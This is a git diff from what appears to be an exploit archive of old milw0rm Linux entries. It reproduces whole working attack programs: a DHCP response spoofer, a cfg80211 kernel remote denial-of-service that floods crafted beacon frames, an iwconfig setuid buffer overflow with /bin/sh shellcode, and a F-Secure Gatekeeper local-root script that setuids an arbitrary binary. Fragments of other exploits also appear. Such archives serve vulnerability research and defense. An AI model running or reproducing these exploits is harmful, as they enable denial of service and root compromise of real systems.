memcpy(ptr, "\x01", 1); + ptr += 1; + memcpy(ptr, &payload_len, 1); + ptr += 1; + memcpy(ptr, payload, payload_len); + ptr += payload_len; + + memcpy(ptr, "\xff", 1); + ptr += 1; + opt_len = ptr - options; + + /* construct full packet payload */ + memset(pktbuf, 0, sizeof(pktbuf)); + ptr = pktbuf; + + eth_pack_hdr(ptr, ETH_ADDR_BROADCAST, "\xc1\x1e\x20\x09\x06\x92", ETH_TYPE_IP); + ptr += ETH_HDR_LEN; + + ip_pack_hdr(ptr, 0, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len, 0x0692, IP_DF, 64, IP_PROTO_UDP, 34145792, IP_ADDR_BROADCAST); + ptr += IP_HDR_LEN; + + udp_pack_hdr(ptr, 67, 68, UDP_HDR_LEN + DHCP_HDR_LEN + opt_len); + ptr += UDP_HDR_LEN; + + memcpy(ptr, dhcp_h, DHCP_HDR_LEN); + ptr += DHCP_HDR_LEN; + + memcpy(ptr, options, opt_len); + ptr += opt_len; + + ip_checksum(pktbuf + ETH_HDR_LEN, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len); + + /* fire off malicious response */ + raw = eth_open(dev); + if (!raw) { + fprintf(stderr, "[-] error opening raw socket on %s\n", dev); + exit(1); + } + eth_send(raw, pktbuf, ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len); + eth_close(raw); +} + +void +usage(char **argv) +{ + fprintf(stderr, "usage: %s [-i interface]\n", argv[0]); + exit(1); +} + +int +main(int argc, char **argv) +{ + int ch, ret; + char *dev = NULL; + char errbuf[PCAP_ERRBUF_SIZE]; + struct bpf_program bfp; + pcap_t *ph; + + opterr = 0; + + while ((ch = getopt(argc, argv, "i:")) != -1) { + switch (ch) { + case 'i': + dev = optarg; + break; + default: + usage(argv); + } + } + + if (!dev) { + dev = pcap_lookupdev(errbuf); + if (!dev) { + fprintf(stderr, "[-] couldn't find default interface: %s\n", errbuf); + exit(1); + } + } + + ph = pcap_open_live(dev, PKT_BUFSIZ, 1, 1, errbuf); + if (!ph) { + fprintf(stderr, "[-] couldn't open interface %s: %s\n", dev, errbuf); + exit(1); + } + + ret = pcap_compile(ph, &bfp, BPF_FILTER, 1, 0); + if (ret == -1) { + fprintf(stderr, "[-] couldn't parse BPF filter: %s\n", pcap_geterr(ph)); + exit(1); + } 
+ + pcap_setfilter(ph, &bfp); + if (ret == -1) { + fprintf(stderr, "[-] couldn't set BPF filter: %s\n", pcap_geterr(ph)); + exit(1); + } + + printf("[+] listening on %s: %s\n", dev, BPF_FILTER); + + pcap_loop(ph, -1, process, dev); + + return 0; +} + +// milw0rm.com [2009-07-27] diff --git a/platforms/linux/dos/9442.c b/platforms/linux/dos/9442.c index 2a5e14856..9e73907e1 100755 --- a/platforms/linux/dos/9442.c +++ b/platforms/linux/dos/9442.c 
@@ -1,176 +1,176 @@ -/* - * cfg80211-remote-dos.c - * - * Linux Kernel < 2.6.30.5 cfg80211 Remote DoS - * Jon Oberheide - * http://jon.oberheide.org - * - * Information: - * - * http://patchwork.kernel.org/patch/41218/ - * - * These pointers can be NULL, the is_mesh() case isn't ever hit in the - * current kernel, but cmp_ies() can be hit under certain conditions. - * - * Usage: - * - * $ gcc cfg80211-remote-dos.c -o cfg80211-remote-dos -lorcon - * $ airmon-ng start wlan0 - * ... - * $ ./cfg80211-remote-dos mon0 mac80211 - * [+] Initializing interface mon0... - * [+] Injecting crafted DoS beacon frames... - * - * Notes: - * - * The NULL pointer dereference is triggered if the victim scans and receives - * a beacon frame that does not contain a SSID IE and then receives another - * one that does have a SSID IE. Raw frame injection via LORCON is required - * on the wireless interface. This should only affect the 2.6.30 series. - */ - -#include -#include -#include -#include -#include - -#include -#include - -#define BEACON_NOSSID \ - "\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \ - "\x00\x03\x52\x00\x00\x00" \ - "\x00\x03\x52\x00\x00\x00" \ - "\x30\x4b" \ - "\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \ - "\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \ - "\x03\x01\x07" \ - "\x05\x04\x00\x01\x01\x00" \ - "\x2a\x01\x04" \ - "\x32\x04\x30\x48\x60\x6c" -#define BEACON_NOSSID_LEN 64 - -#define BEACON_SSID \ - "\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \ - "\x00\x03\x52\x00\x00\x00" \ - "\x00\x03\x52\x00\x00\x00" \ - "\x30\x4b" \ - "\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \ - "\x00\x03\x44\x6f\x53" \ - "\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \ - "\x03\x01\x07" \ - "\x05\x04\x00\x01\x01\x00" \ - "\x2a\x01\x04" \ - "\x32\x04\x30\x48\x60\x6c" -#define BEACON_SSID_LEN 69 - -void -usage(char **argv) -{ - int i; - struct tx80211_cardlist *cardlist; - - printf("Usage: %s [interface] [drivername]\n", argv[0]); - - cardlist = tx80211_getcardlist(); - - if (cardlist == 
NULL) { - printf("Error accessing supported cardlist.\n"); - } else { - printf("\nSupported drivers are: "); - for (i = 1; i < cardlist->num_cards; i++) { - printf("%s ", cardlist->cardnames[i]); - } - printf("\n"); - } - tx80211_freecardlist(cardlist); -} - -int -main(int argc, char **argv) -{ - struct tx80211 tx; - struct tx80211_packet pkt; - char p1[BEACON_NOSSID_LEN]; - char p2[BEACON_SSID_LEN]; - int ret, drivertype; - uint8_t randbyte; - - if (argc < 3) { - usage(argv); - return 0; - } - - printf("[+] Initializing interface %s...\n", argv[1]); - - drivertype = tx80211_resolvecard(argv[2]); - if (drivertype == INJ_NODRIVER) { - printf("[-] Driver name not recognized.\n"); - exit(1); - } - - ret = tx80211_init(&tx, argv[1], drivertype); - if (ret < 0) { - printf("[-] Error initializing %s/%s", argv[1], argv[2]); - exit(1); - } - - ret = tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON); - if (ret != 0) { - printf("[-] Error setting monitor mode.\n"); - printf("[-] %s.\n", tx80211_geterrstr(&tx)); - exit(1); - } - - ret = tx80211_setchannel(&tx, 11); - if (ret < 0) { - printf("[-] Error setting channel.\n"); - printf("[-] %s.\n", tx80211_geterrstr(&tx)); - exit(1); - } - - ret = tx80211_open(&tx); - if (ret < 0) { - printf("[-] Unable to open interface %s\n", tx.ifname); - printf("[-] %s.\n", tx80211_geterrstr(&tx)); - exit(1); - } - - srand(time(NULL)); - - memcpy(p1, BEACON_NOSSID, BEACON_NOSSID_LEN); - memcpy(p2, BEACON_SSID, BEACON_SSID_LEN); - - printf("[+] Injecting crafted DoS beacon frames...\n"); - - while (1) { - randbyte = rand() & 0xff; - p1[15] = randbyte; - p1[21] = randbyte; - p2[15] = randbyte; - p2[21] = randbyte; - - pkt.packet = p1; - pkt.plen = BEACON_NOSSID_LEN; - if (tx80211_txpacket(&tx, &pkt) < 0) { - printf("[-] Unable to transmit packet.\n"); - printf("[-] %s.\n", tx80211_geterrstr(&tx)); - exit(1); - } - - pkt.packet = p2; - pkt.plen = BEACON_SSID_LEN; - if (tx80211_txpacket(&tx, &pkt) < 0) { - printf("[-] Unable to transmit 
packet.\n"); - printf("[-] %s.\n", tx80211_geterrstr(&tx)); - exit(1); - } - } - - tx80211_close(&tx); - - return 0; -} - -// milw0rm.com [2009-08-18] +/* + * cfg80211-remote-dos.c + * + * Linux Kernel < 2.6.30.5 cfg80211 Remote DoS + * Jon Oberheide + * http://jon.oberheide.org + * + * Information: + * + * http://patchwork.kernel.org/patch/41218/ + * + * These pointers can be NULL, the is_mesh() case isn't ever hit in the + * current kernel, but cmp_ies() can be hit under certain conditions. + * + * Usage: + * + * $ gcc cfg80211-remote-dos.c -o cfg80211-remote-dos -lorcon + * $ airmon-ng start wlan0 + * ... + * $ ./cfg80211-remote-dos mon0 mac80211 + * [+] Initializing interface mon0... + * [+] Injecting crafted DoS beacon frames... + * + * Notes: + * + * The NULL pointer dereference is triggered if the victim scans and receives + * a beacon frame that does not contain a SSID IE and then receives another + * one that does have a SSID IE. Raw frame injection via LORCON is required + * on the wireless interface. This should only affect the 2.6.30 series. 
+ */ + +#include +#include +#include +#include +#include + +#include +#include + +#define BEACON_NOSSID \ + "\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \ + "\x00\x03\x52\x00\x00\x00" \ + "\x00\x03\x52\x00\x00\x00" \ + "\x30\x4b" \ + "\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \ + "\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \ + "\x03\x01\x07" \ + "\x05\x04\x00\x01\x01\x00" \ + "\x2a\x01\x04" \ + "\x32\x04\x30\x48\x60\x6c" +#define BEACON_NOSSID_LEN 64 + +#define BEACON_SSID \ + "\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \ + "\x00\x03\x52\x00\x00\x00" \ + "\x00\x03\x52\x00\x00\x00" \ + "\x30\x4b" \ + "\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \ + "\x00\x03\x44\x6f\x53" \ + "\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \ + "\x03\x01\x07" \ + "\x05\x04\x00\x01\x01\x00" \ + "\x2a\x01\x04" \ + "\x32\x04\x30\x48\x60\x6c" +#define BEACON_SSID_LEN 69 + +void +usage(char **argv) +{ + int i; + struct tx80211_cardlist *cardlist; + + printf("Usage: %s [interface] [drivername]\n", argv[0]); + + cardlist = tx80211_getcardlist(); + + if (cardlist == NULL) { + printf("Error accessing supported cardlist.\n"); + } else { + printf("\nSupported drivers are: "); + for (i = 1; i < cardlist->num_cards; i++) { + printf("%s ", cardlist->cardnames[i]); + } + printf("\n"); + } + tx80211_freecardlist(cardlist); +} + +int +main(int argc, char **argv) +{ + struct tx80211 tx; + struct tx80211_packet pkt; + char p1[BEACON_NOSSID_LEN]; + char p2[BEACON_SSID_LEN]; + int ret, drivertype; + uint8_t randbyte; + + if (argc < 3) { + usage(argv); + return 0; + } + + printf("[+] Initializing interface %s...\n", argv[1]); + + drivertype = tx80211_resolvecard(argv[2]); + if (drivertype == INJ_NODRIVER) { + printf("[-] Driver name not recognized.\n"); + exit(1); + } + + ret = tx80211_init(&tx, argv[1], drivertype); + if (ret < 0) { + printf("[-] Error initializing %s/%s", argv[1], argv[2]); + exit(1); + } + + ret = tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON); + if (ret != 0) { + 
printf("[-] Error setting monitor mode.\n");
+ printf("[-] %s.\n", tx80211_geterrstr(&tx));
+ exit(1);
+ }
+
+ ret = tx80211_setchannel(&tx, 11);
+ if (ret < 0) {
+ printf("[-] Error setting channel.\n");
+ printf("[-] %s.\n", tx80211_geterrstr(&tx));
+ exit(1);
+ }
+
+ ret = tx80211_open(&tx);
+ if (ret < 0) {
+ printf("[-] Unable to open interface %s\n", tx.ifname);
+ printf("[-] %s.\n", tx80211_geterrstr(&tx));
+ exit(1);
+ }
+
+ srand(time(NULL));
+
+ memcpy(p1, BEACON_NOSSID, BEACON_NOSSID_LEN);
+ memcpy(p2, BEACON_SSID, BEACON_SSID_LEN);
+
+ printf("[+] Injecting crafted DoS beacon frames...\n");
+
+ while (1) {
+ randbyte = rand() & 0xff;
+ p1[15] = randbyte;
+ p1[21] = randbyte;
+ p2[15] = randbyte;
+ p2[21] = randbyte;
+
+ pkt.packet = p1;
+ pkt.plen = BEACON_NOSSID_LEN;
+ if (tx80211_txpacket(&tx, &pkt) < 0) {
+ printf("[-] Unable to transmit packet.\n");
+ printf("[-] %s.\n", tx80211_geterrstr(&tx));
+ exit(1);
+ }
+
+ pkt.packet = p2;
+ pkt.plen = BEACON_SSID_LEN;
+ if (tx80211_txpacket(&tx, &pkt) < 0) {
+ printf("[-] Unable to transmit packet.\n");
+ printf("[-] %s.\n", tx80211_geterrstr(&tx));
+ exit(1);
+ }
+ }
+
+ tx80211_close(&tx);
+
+ return 0;
+}
+
+// milw0rm.com [2009-08-18]
diff --git a/platforms/linux/dos/957.c b/platforms/linux/dos/957.c
index 8d9ace807..b5a6eb1dc 100755
--- a/platforms/linux/dos/957.c
+++ b/platforms/linux/dos/957.c
@@ -275,6 +275,6 @@ void printe(char *err,signed char e){
 printf("[!] %s\n",err);
 if(e)exit(e);
 return;
-}
-
-// milw0rm.com [2005-04-26]
+}
+
+// milw0rm.com [2005-04-26]
diff --git a/platforms/linux/dos/958.c b/platforms/linux/dos/958.c
index cf3d7637d..05ac899e2 100755
--- a/platforms/linux/dos/958.c
+++ b/platforms/linux/dos/958.c
@@ -332,6 +332,6 @@ void printe(char *err,signed char e){
 printf("[!] %s\n",err);
 if(e)exit(e);
 return;
-}
-
-// milw0rm.com [2005-04-26]
+}
+
+// milw0rm.com [2005-04-26]
diff --git a/platforms/linux/dos/959.c b/platforms/linux/dos/959.c
index 6b3b78d0c..ab37f2103 100755
--- a/platforms/linux/dos/959.c
+++ b/platforms/linux/dos/959.c
@@ -239,6 +239,6 @@ void printe(char *err,signed char e){
 printf("[!] %s\n",err);
 if(e)exit(e);
 return;
-}
-
-// milw0rm.com [2005-04-26]
+}
+
+// milw0rm.com [2005-04-26]
diff --git a/platforms/linux/dos/998.c b/platforms/linux/dos/998.c
index 40ed17b7b..aa89d9b65 100755
--- a/platforms/linux/dos/998.c
+++ b/platforms/linux/dos/998.c
@@ -132,6 +132,6 @@ return -1;
 }
 close(fd);
 return 0;
-}
-
-// milw0rm.com [2005-05-17]
+}
+
+// milw0rm.com [2005-05-17]
diff --git a/platforms/linux/dos/999.c b/platforms/linux/dos/999.c
index 6448cf9cf..3a2dc328e 100755
--- a/platforms/linux/dos/999.c
+++ b/platforms/linux/dos/999.c
@@ -101,6 +101,6 @@ static void init_plugin(GaimPlugin *plugin)
 {
 }
-GAIM_INIT_PLUGIN(XMMSPlugin, init_plugin, info)
-
-// milw0rm.com [2005-05-17]
+GAIM_INIT_PLUGIN(XMMSPlugin, init_plugin, info)
+
+// milw0rm.com [2005-05-17]
diff --git a/platforms/linux/local/1009.c b/platforms/linux/local/1009.c
index 12daf125c..4e0d49c0f 100755
--- a/platforms/linux/local/1009.c
+++ b/platforms/linux/local/1009.c
@@ -65,6 +65,6 @@ main()
 printf("Firing up exim - cross your fingers for shell!\n");
 execve(exim[0],exim,0x0);
 return;
-}
-
-// milw0rm.com [2005-05-25]
+}
+
+// milw0rm.com [2005-05-25]
diff --git a/platforms/linux/local/1029.c b/platforms/linux/local/1029.c
index f4cbef639..82dd15c93 100755
--- a/platforms/linux/local/1029.c
+++ b/platforms/linux/local/1029.c
@@ -82,6 +82,6 @@ execl("./epsxe", "epsxe", "-nogui", buffer, 0);
 free(buffer);
 return 0;
-}
-
-// milw0rm.com [2005-06-04]
+}
+
+// milw0rm.com [2005-06-04]
diff --git a/platforms/linux/local/106.c b/platforms/linux/local/106.c
index 2c05f72d7..81baa45e6 100755
--- a/platforms/linux/local/106.c
+++ b/platforms/linux/local/106.c
@@ -98,6 +98,6 @@ sc_address & ALG_MASK);
 execve(argv[0],argv,envp);
-}
-
-// milw0rm.com [2003-09-27]
+}
+
+// milw0rm.com [2003-09-27]
diff --git a/platforms/linux/local/1154.pl b/platforms/linux/local/1154.pl
index ab65bf588..8da2553bb 100755
--- a/platforms/linux/local/1154.pl
+++ b/platforms/linux/local/1154.pl
@@ -142,6 +142,6 @@ print("cleaning up /tmp\n");
 chdir("../../../");
 system("rm -rf AAAA*/");
-# EOF
-
-# milw0rm.com [2005-08-16]
+# EOF
+
+# milw0rm.com [2005-08-16]
diff --git a/platforms/linux/local/1170.c b/platforms/linux/local/1170.c
index 89d265b21..738b9334d 100755
--- a/platforms/linux/local/1170.c
+++ b/platforms/linux/local/1170.c
@@ -127,6 +127,6 @@ int main(int argc, char **argv){
 #endif
 return 0;
-}
-
-// milw0rm.com [2001-07-13]
+}
+
+// milw0rm.com [2001-07-13]
diff --git a/platforms/linux/local/1181.c b/platforms/linux/local/1181.c
index 7605f6628..3161d26a4 100755
--- a/platforms/linux/local/1181.c
+++ b/platforms/linux/local/1181.c
@@ -68,6 +68,6 @@ int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
 system(args->args[0]);
 return(0);
-}
-
-// milw0rm.com [2004-12-24]
+}
+
+// milw0rm.com [2004-12-24]
diff --git a/platforms/linux/local/1187.c b/platforms/linux/local/1187.c
index 48a4cff86..dcf9ea1eb 100755
--- a/platforms/linux/local/1187.c
+++ b/platforms/linux/local/1187.c
@@ -248,6 +248,6 @@ printf("[!] %s\n",err);
 if(e) exit(1);
 return;
-}
-
-// milw0rm.com [2005-08-30]
+}
+
+// milw0rm.com [2005-08-30]
diff --git a/platforms/linux/local/1215.c b/platforms/linux/local/1215.c
index 9f6461373..c073bdb34 100755
--- a/platforms/linux/local/1215.c
+++ b/platforms/linux/local/1215.c
@@ -1,55 +1,55 @@
-// (if the iwconfig executable is setuid) /str0ke
-
-#include
-#include
-#include
-#include
-
-/* 45 Byte /bin/sh >> http://www.milw0rm.com/id.php?id=1169 */
-char shellcode[]=
- "\x31\xc0\x31\xdb\x50\x68\x2f\x2f"
- "\x73\x68\x68\x2f\x62\x69\x6e\x89"
- "\xe3\x50\x53\x89\xe1\x31\xd2\xb0"
- "\x0b\x51\x52\x55\x89\xe5\x0f\x34"
- "\x31\xc0\x31\xdb\xfe\xc0\x51\x52"
- "\x55\x89\xe5\x0f\x34";
-
-int main(int argc,char **argv){
- char buf[96];
- long esp, *addr_ptr;
- unsigned long ret;
- int i, offset;
- unsigned long sp(void)
- { __asm__("movl %esp, %eax");}
- char *prog[]={argv[1],buf,NULL};
- char *env[]={"3v1lsh3ll0=",shellcode,NULL};
-
- if (argc >= 2) {
- printf("\n*********************************************\n");
- printf(" iwconfig Version 26 Localroot Exploit \n");
- printf(" Coded by Qnix[at]bsdmail[dot]org \n");
- printf("*********************************************\n\n");
- } else {
- printf("\n*********************************************\n");
- printf(" iwconfig Version 26 Localroot Exploit \n");
- printf(" Coded by Qnix[at]bsdmail[dot]org \n");
- printf("*********************************************\n\n");
- printf("\n USEAGE: ./iwconfig-exploit \n\n");
- return 1;
- }
-
- offset = 0;
- esp = sp();
- ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06;
- printf("[~] S-p.ESP : 0x%x\n", esp);
- printf("[~] O-F.ESP : 0x%x\n", offset);
- printf("[~] Return Addr : 0x%x\n\n", ret);
-
- memset(buf,0x41,sizeof(buf));
- memcpy(&buf[92],&ret,4);
-
- execve(prog[0],prog,env);
-
- }
-
-// milw0rm.com [2005-09-14]
+// (if the iwconfig executable is setuid) /str0ke
+
+#include
+#include
+#include
+#include
+
+/* 45 Byte /bin/sh >> http://www.milw0rm.com/id.php?id=1169 */
+char shellcode[]=
+ "\x31\xc0\x31\xdb\x50\x68\x2f\x2f"
+ "\x73\x68\x68\x2f\x62\x69\x6e\x89"
+ "\xe3\x50\x53\x89\xe1\x31\xd2\xb0"
+ "\x0b\x51\x52\x55\x89\xe5\x0f\x34"
+ "\x31\xc0\x31\xdb\xfe\xc0\x51\x52"
+ "\x55\x89\xe5\x0f\x34";
+
+int main(int argc,char **argv){
+ char buf[96];
+
long esp, *addr_ptr;
+ unsigned long ret;
+ int i, offset;
+ unsigned long sp(void)
+ { __asm__("movl %esp, %eax");}
+ char *prog[]={argv[1],buf,NULL};
+ char *env[]={"3v1lsh3ll0=",shellcode,NULL};
+
+ if (argc >= 2) {
+ printf("\n*********************************************\n");
+ printf(" iwconfig Version 26 Localroot Exploit \n");
+ printf(" Coded by Qnix[at]bsdmail[dot]org \n");
+ printf("*********************************************\n\n");
+ } else {
+ printf("\n*********************************************\n");
+ printf(" iwconfig Version 26 Localroot Exploit \n");
+ printf(" Coded by Qnix[at]bsdmail[dot]org \n");
+ printf("*********************************************\n\n");
+ printf("\n USEAGE: ./iwconfig-exploit \n\n");
+ return 1;
+ }
+
+ offset = 0;
+ esp = sp();
+ ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06;
+ printf("[~] S-p.ESP : 0x%x\n", esp);
+ printf("[~] O-F.ESP : 0x%x\n", offset);
+ printf("[~] Return Addr : 0x%x\n\n", ret);
+
+ memset(buf,0x41,sizeof(buf));
+ memcpy(&buf[92],&ret,4);
+
+ execve(prog[0],prog,env);
+
+ }
+
+// milw0rm.com [2005-09-14]
diff --git a/platforms/linux/local/1297.py b/platforms/linux/local/1297.py
index b9da7363f..527caa365 100755
--- a/platforms/linux/local/1297.py
+++ b/platforms/linux/local/1297.py
@@ -1,239 +1,239 @@
-#!/usr/bin/env python
-#
-# F-Secure Anti-Virus Internet Gatekeeper for Linux <2.15.484
-# F-Secure Anti-Virus Linux Gateway <2.16 # added line 3-4 for references /str0ke
-#
-##############################################################################
-## fsigk_exp.py: F-Secure Internet Gatekeeper for Linux local root exploit
-## acknowledgements: everyone in pure-elite and uDc.
-##
-## coded by: xavier@tigerteam.se [http://xavsec.blogspot.com]
-##############################################################################
-
-##############################################################################
-## Make proper checks and import nessesary calls from modules.
-##
-
-try:
- from sys import argv
-except Exception:
- print "the 'sys' module could not be loaded"
- raise SystemExit
-
-try:
- from os import unlink, stat, error, symlink, system, chmod
-except Exception:
- print "the 'os' module could not be loaded"
- raise SystemExit
-
-try:
- import getopt
-except Exception:
- print "the 'getopt' module could not be loaded"
- raise SystemExit
-
-##############################################################################
-## Constants.
-##
-
-__program__ = argv[0]
-__version__ = "0.1beta"
-__author__ = ""
-__lastedit__ = "Thu Sep 22 23:18:39 EDT 2005"
-__usage__ = """usage: %s [-options]
-
-options:
- --version show program's version number and exit.
- -h, --help show this help message and exit.
-
- -s, --suid file location to suid.
- -d, --dir cgi directory.
- -c, --clean cleans any left over files from the environment creation.
- -# enter numerical value of vulnerable file to exploit.
[list below]
-
- 1: ifconfig_suid.cgi | 2: reboot_suid.cgi | 3: proxy_suid.cgi
- 4: edittmpl_suid.cgi | 5: version_suid.cgi | 6: hostname_suid.cgi
- 7: gateway_suid.cgi | 8: halt_suid.cgi | 9: edituserdb_suid.cgi
-10: htpasswd_suid.cgi | 11: pattern_up_suid.cgi | 12: license_suid.cgi
-13: iptables_suid.cgi | 14: dns_suid.cgi | 15: pattern_autoup_suid.cgi
-16: spam_list_suid.cgi | 17: diag_suid.cgi""" % (__program__)
-
-#######################################################################################
-## Functions.
-##
-
-def _write(file, payload):
- try:
- open(file, 'w').write(payload)
- chmod(file, 0100)
- except Exception, err:
- print ("[-] %s" % (err))
-
-def _exists(path):
- try:
- stat(path)
- except error:
- return False
- return True
-
-def _handleopts():
- for opt in argv[1:]:
- if opt in ("-h", "--help"):
- print "%s" % (__usage__),
- raise SystemExit
- if opt in ("-v", "--version"):
- print "%s (%s)" % (__version__, __lastedit__),
- raise SystemExit
-
- _method_ = 'ifconfig_suid.cgi'
- _file_ = 'ifconfig.cgi'
- for opt in argv[1:]:
- if opt == "-1":
- _method_ = 'ifconfig_suid.cgi'
- elif opt == "-2":
- _method_ = 'reboot_suid.cgi'
- _file_ = 'reboot.cgi'
- elif opt == "-3":
- _method_ = 'proxy_suid.cgi'
- _file_ = 'proxy.cgi'
- elif opt == "-4":
- _method_ = 'edittmpl_suid.cgi'
- _file_ = 'edittmpl.cgi'
- elif opt == "-5":
- _method_ = 'version_suid.cgi'
- _file_ = 'version.cgi'
- elif opt == "-6":
- _method_ = 'hostname_suid.cgi'
- _file_ = 'hostname.cgi'
- elif opt == "-7":
- _method_ = 'gateway_suid.cgi'
- _file_ = 'gateway.cgi'
- elif opt == "-8":
- _method_ = 'halt_suid.cgi'
- _file_ = 'halt.cgi'
- elif opt == "-9":
- _method_ = 'edituserdb_suid.cgi'
- _file_ = 'edituserdb.cgi'
- elif opt == "-10":
- _method_ = 'htpasswd_suid.cgi'
- _file_ = 'htpasswd.cgi'
- elif opt == "-11":
- _method_ = 'pattern_up_suid.cgi'
- _file_ = 'pattern_up.cgi'
- elif opt == "-12":
- _method_ = 'license_suid.cgi'
- _file_ = 'license.cgi'
- elif opt == "-13":
-
_method_ = 'iptables_suid.cgi'
- _file_ = 'iptables.cgi'
- elif opt == "-14":
- _method_ = 'dns_suid.cgi'
- _file_ = 'dns.cgi'
- elif opt == "-15":
- _method_ = 'pattern_autoup_suid.cgi'
- _file_ = 'pattern_autoup.cgi'
- elif opt == "-16":
- _method_ = 'spam_list_suid.cgi'
- _file_ = 'spam_list.cgi'
- elif opt == "-17":
- _method_ = 'diag_suid.cgi'
- _file_ = 'diag.cgi'
- else:
- pass
-
- try:
- opts = getopt.getopt(argv[1:], 'c1234567890s:d:', ['clean', \
- 'suid=', \
- 'dir='])[0]
- except Exception, (err):
- print "[-] %s" % (err),
- raise SystemExit
-
- _dir_ = None
- _payload_ = None
- _combine_ = None
-
- for o, a in opts:
- if o in ("-c", "--clean"):
- _clean()
- print "[*] done"
- raise SystemExit
- if o in ("-d", "--dir"):
- if _exists(a):
- _dir_ = a
- else:
- print "[-] unable to access the %s directory" % (_dir_),
- raise SystemExit
- if o in ("-s", "--suid"):
- if _exists(a):
- _payload_ = _suid(a)
- else:
- print "[-] unable to access binary."
- raise SystemExit
-
- if _dir_ == None:
- print "[-] no directory was given [try -h for help menu]"
- raise SystemExit
- if _payload_ == None:
- print "[-] enter binary to suid [try -h for help menu]"
- raise SystemExit
- _combined_ = "%s/%s" % (_dir_, _method_)
- if not _exists(_combined_):
- print "[-] method not possible, try another."
- raise SystemExit
-
- print "[*] creating environment..."
- try:
- symlink('%s/%s' % (_dir_, _method_), 'runbad')
- _write(_file_, _payload_)
- except Exception, err:
- raise SystemExit
-
-
-def _suid(file):
- _suid_ = """#!/bin/sh
-chown 0.0 %(file)s
-chmod 4755 %(file)s
-""" % (locals())
- return _suid_
-
-
-def _clean():
- try:
- files = ['runbad', 'ifconfig.cgi', 'reboot.cgi', 'proxy.cgi',
- 'edittmpl.cgi', 'version.cgi', 'hostname.cgi', 'gateway.cgi',
- 'halt.cgi', 'edituserdb.cgi', 'htpasswd.cgi', 'pattern_up.cgi',
- 'license.cgi', 'iptables.cgi', 'dns.cgi', 'pattern_autoup.cgi',
- 'spam_list.cgi', 'diag_suid.cgi']
-
- for file in files:
- if _exists(file): unlink(file)
-
- except Exception, err:
- print "[-] %s" % (err),
-
-
-##############################################################################
-## main() // main code.
-##
-
-def main():
- try:
- print "[INFO] F-Secure Internet Gatekeeper for Linux <=2.10-431 local exploit by %s" % (__author__)
- print "[*] handling options, arguments..."
- _handleopts()
- print "[*] executing exploit..."
- system('./runbad')
- print "[*] cleaning..."
- _clean()
- print "[*] done... try executing the specified binary."
- except KeyboardInterrupt:
- print "[-] caught keyboard interuption"
- raise SystemExit
- except Exception, (err):
- _clean()
- raise SystemExit
-
-if __name__ == '__main__': main()
-
-# milw0rm.com [2005-11-07]
+#!/usr/bin/env python
+#
+# F-Secure Anti-Virus Internet Gatekeeper for Linux <2.15.484
+# F-Secure Anti-Virus Linux Gateway <2.16 # added line 3-4 for references /str0ke
+#
+##############################################################################
+## fsigk_exp.py: F-Secure Internet Gatekeeper for Linux local root exploit
+## acknowledgements: everyone in pure-elite and uDc.
+##
+## coded by: xavier@tigerteam.se [http://xavsec.blogspot.com]
+##############################################################################
+
+##############################################################################
+## Make proper checks and import nessesary calls from modules.
+##
+
+try:
+ from sys import argv
+except Exception:
+ print "the 'sys' module could not be loaded"
+ raise SystemExit
+
+try:
+ from os import unlink, stat, error, symlink, system, chmod
+except Exception:
+ print "the 'os' module could not be loaded"
+ raise SystemExit
+
+try:
+ import getopt
+except Exception:
+ print "the 'getopt' module could not be loaded"
+ raise SystemExit
+
+##############################################################################
+## Constants.
+##
+
+__program__ = argv[0]
+__version__ = "0.1beta"
+__author__ = ""
+__lastedit__ = "Thu Sep 22 23:18:39 EDT 2005"
+__usage__ = """usage: %s [-options]
+
+options:
+ --version show program's version number and exit.
+ -h, --help show this help message and exit.
+
+ -s, --suid file location to suid.
+ -d, --dir cgi directory.
+ -c, --clean cleans any left over files from the environment creation.
+ -# enter numerical value of vulnerable file to exploit. [list below]
+
+ 1: ifconfig_suid.cgi | 2: reboot_suid.cgi | 3: proxy_suid.cgi
+ 4: edittmpl_suid.cgi | 5: version_suid.cgi | 6: hostname_suid.cgi
+ 7: gateway_suid.cgi | 8: halt_suid.cgi | 9: edituserdb_suid.cgi
+10: htpasswd_suid.cgi | 11: pattern_up_suid.cgi | 12: license_suid.cgi
+13: iptables_suid.cgi | 14: dns_suid.cgi | 15: pattern_autoup_suid.cgi
+16: spam_list_suid.cgi | 17: diag_suid.cgi""" % (__program__)
+
+#######################################################################################
+## Functions.
+##
+
+def _write(file, payload):
+ try:
+ open(file, 'w').write(payload)
+ chmod(file, 0100)
+ except Exception, err:
+ print ("[-] %s" % (err))
+
+def _exists(path):
+ try:
+ stat(path)
+ except error:
+ return False
+ return True
+
+def _handleopts():
+ for opt in argv[1:]:
+ if opt in ("-h", "--help"):
+ print "%s" % (__usage__),
+ raise SystemExit
+ if opt in ("-v", "--version"):
+ print "%s (%s)" % (__version__, __lastedit__),
+ raise SystemExit
+
+ _method_ = 'ifconfig_suid.cgi'
+ _file_ = 'ifconfig.cgi'
+ for opt in argv[1:]:
+ if opt == "-1":
+ _method_ = 'ifconfig_suid.cgi'
+ elif opt == "-2":
+ _method_ = 'reboot_suid.cgi'
+ _file_ = 'reboot.cgi'
+ elif opt == "-3":
+ _method_ = 'proxy_suid.cgi'
+ _file_ = 'proxy.cgi'
+ elif opt == "-4":
+ _method_ = 'edittmpl_suid.cgi'
+ _file_ = 'edittmpl.cgi'
